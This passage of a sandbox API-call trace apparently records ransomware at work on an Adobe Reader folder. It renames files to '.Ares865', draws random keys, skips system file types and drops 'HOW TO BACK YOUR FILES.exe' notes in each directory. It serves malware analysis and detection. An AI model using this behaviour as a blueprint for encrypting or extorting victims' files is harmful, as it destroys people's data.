10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\data1.cab"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\data1.cab.ares865"), dwFlags=0x1) returned 1 [0154.944] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\data1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.945] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=128186359) returned 1 [0154.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.945] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.946] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.946] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.064] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0155.065] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.065] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.076] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="Setup.exe" | out: lpString1="Setup.exe") returned="Setup.exe" [0155.076] lstrlenW (lpString="Setup.exe") returned 9 [0155.077] lstrlenW (lpString="Ares865") returned 7 [0155.077] lstrcmpiW (lpString1="tup.exe", lpString2="Ares865") returned 1 [0155.077] lstrlenW (lpString=".dll") returned 4 [0155.077] lstrcmpiW (lpString1="Setup.exe", lpString2=".dll") returned 1 [0155.077] lstrlenW (lpString=".lnk") returned 4 [0155.077] lstrcmpiW (lpString1="Setup.exe", lpString2=".lnk") returned 1 [0155.077] lstrlenW (lpString=".ini") returned 4 [0155.077] lstrcmpiW (lpString1="Setup.exe", lpString2=".ini") returned 1 [0155.077] lstrlenW (lpString=".sys") returned 4 [0155.077] lstrcmpiW (lpString1="Setup.exe", lpString2=".sys") returned 1 [0155.077] lstrlenW (lpString="Setup.exe") returned 9 [0155.077] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Setup.exe.Ares865") returned 109 [0155.077] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Setup.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Setup.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.exe.ares865"), dwFlags=0x1) returned 1 [0155.081] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Setup.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.081] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=337352) returned 1 [0155.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0155.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0155.082] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0155.082] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.082] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.097] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0155.097] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.097] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.102] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="setup.ini" | out: lpString1="setup.ini") returned="setup.ini" [0155.102] lstrlenW (lpString="setup.ini") returned 9 [0155.102] lstrlenW (lpString="Ares865") returned 7 [0155.102] lstrcmpiW (lpString1="tup.ini", lpString2="Ares865") returned 1 [0155.102] lstrlenW (lpString=".dll") returned 4 [0155.102] lstrcmpiW (lpString1="setup.ini", lpString2=".dll") returned 1 [0155.102] lstrlenW (lpString=".lnk") returned 4 [0155.103] lstrcmpiW (lpString1="setup.ini", lpString2=".lnk") returned 1 [0155.103] lstrlenW (lpString=".ini") returned 4 [0155.103] lstrcmpiW (lpString1="setup.ini", lpString2=".ini") returned 1 [0155.103] lstrlenW (lpString=".sys") returned 4 [0155.103] lstrcmpiW (lpString1="setup.ini", lpString2=".sys") returned 1 [0155.103] lstrlenW (lpString="setup.ini") returned 9 [0155.103] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini.Ares865") returned 109 [0155.103] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.ini"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.ini.ares865"), dwFlags=0x1) returned 1 [0155.105] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.105] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=928) returned 1 [0155.105] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0155.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0155.106] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0155.106] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.107] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.109] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0155.110] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.110] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.110] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource" [0155.110] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource" [0155.111] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.111] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.111] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.112] GetLastError () returned 0x0 [0155.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0155.112] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0155.112] CloseHandle (hObject=0x120) returned 1 [0155.113] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.113] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53eb7420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.113] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.113] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.113] lstrcpyW (in: lpString1=0x2cce464, lpString2="CIDFont" | out: lpString1="CIDFont") returned="CIDFont" [0155.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0155.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1708 [0155.113] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0155.113] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x800a53c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x800a53c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CMap", cAlternateFileName="")) returned 1 [0155.113] lstrcmpiW (lpString1="CMap", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.113] lstrcmpiW (lpString1="CMap", lpString2="aoldtz.exe") returned 1 [0155.113] lstrcpyW (in: lpString1=0x2cce464, lpString2="CMap" | out: lpString1="CMap") returned="CMap" [0155.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0155.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6e) returned 0x2e4710 [0155.113] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0155.113] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1d9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ENUtxt.pdf", cAlternateFileName="")) returned 1 [0155.113] lstrcmpiW (lpString1="ENUtxt.pdf", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.114] lstrcmpiW (lpString1="ENUtxt.pdf", lpString2="aoldtz.exe") returned 1 [0155.114] lstrcpyW (in: lpString1=0x2cce464, lpString2="ENUtxt.pdf" | out: lpString1="ENUtxt.pdf") returned="ENUtxt.pdf" [0155.114] lstrlenW (lpString="ENUtxt.pdf") returned 10 [0155.114] lstrlenW (lpString="Ares865") returned 7 [0155.114] lstrcmpiW (lpString1="txt.pdf", lpString2="Ares865") returned 1 [0155.114] lstrlenW (lpString=".dll") returned 4 [0155.114] lstrcmpiW (lpString1="ENUtxt.pdf", lpString2=".dll") returned 1 [0155.114] lstrlenW (lpString=".lnk") returned 4 [0155.114] lstrcmpiW (lpString1="ENUtxt.pdf", lpString2=".lnk") returned 1 [0155.114] lstrlenW (lpString=".ini") returned 4 [0155.114] lstrcmpiW (lpString1="ENUtxt.pdf", lpString2=".ini") returned 1 [0155.114] lstrlenW (lpString=".sys") returned 4 [0155.114] lstrcmpiW (lpString1="ENUtxt.pdf", lpString2=".sys") returned 1 [0155.114] lstrlenW (lpString="ENUtxt.pdf") returned 10 [0155.114] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf.Ares865") returned 68 [0155.114] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\enutxt.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\enutxt.pdf.ares865"), dwFlags=0x1) returned 1 [0155.116] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\enutxt.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.116] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7582) returned 1 [0155.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0155.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0155.117] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0155.117] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.117] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.120] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0155.121] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.121] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.122] lstrcpyW (in: lpString1=0x2cce464, lpString2="Font" | out: lpString1="Font") returned="Font" [0155.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0155.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6e) returned 0x2e4788 [0155.122] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0155.122] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53eb7420, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0155.122] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0155.122] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x544125a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0155.122] lstrcmpiW (lpString1="Linguistics", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0155.122] lstrcmpiW (lpString1="Linguistics", lpString2="aoldtz.exe") returned 1 [0155.122] lstrcpyW (in: lpString1=0x2cce464, lpString2="Linguistics" | out: lpString1="Linguistics") returned="Linguistics" [0155.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0155.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f00d8 [0155.122] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0155.122] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81d5bd20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x543ec440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x543ec440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SaslPrep", cAlternateFileName="")) returned 1 [0155.122] lstrcmpiW (lpString1="SaslPrep", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0155.122] lstrcmpiW (lpString1="SaslPrep", lpString2="aoldtz.exe") returned 1 [0155.123] lstrcpyW (in: lpString1=0x2cce464, lpString2="SaslPrep" | out: lpString1="SaslPrep") returned="SaslPrep" [0155.123] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0155.123] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1788 [0155.123] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0155.123] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53eb7420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TypeSupport", cAlternateFileName="TYPESU~1")) returned 1 [0155.123] lstrcmpiW (lpString1="TypeSupport", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0155.123] lstrcmpiW (lpString1="TypeSupport", lpString2="aoldtz.exe") returned 1 [0155.123] lstrcpyW (in: lpString1=0x2cce464, lpString2="TypeSupport" | out: lpString1="TypeSupport") returned="TypeSupport" [0155.123] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0155.123] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f0518 [0155.123] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0155.123] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53eb7420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TypeSupport", cAlternateFileName="TYPESU~1")) returned 0 [0155.123] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0155.123] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79b0 [0155.123] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport" [0155.124] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport" [0155.124] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.124] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.124] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.125] GetLastError () returned 0x0 [0155.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0155.125] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0155.125] CloseHandle (hObject=0x120) returned 1 [0155.125] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.125] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53eb7420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.126] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.126] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.126] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Unicode" | out: lpString1="Unicode") returned="Unicode" [0155.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0155.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c) returned 0x336fc8 [0155.126] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0155.126] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53eb7420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Unicode", cAlternateFileName="")) returned 0 [0155.126] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0155.126] 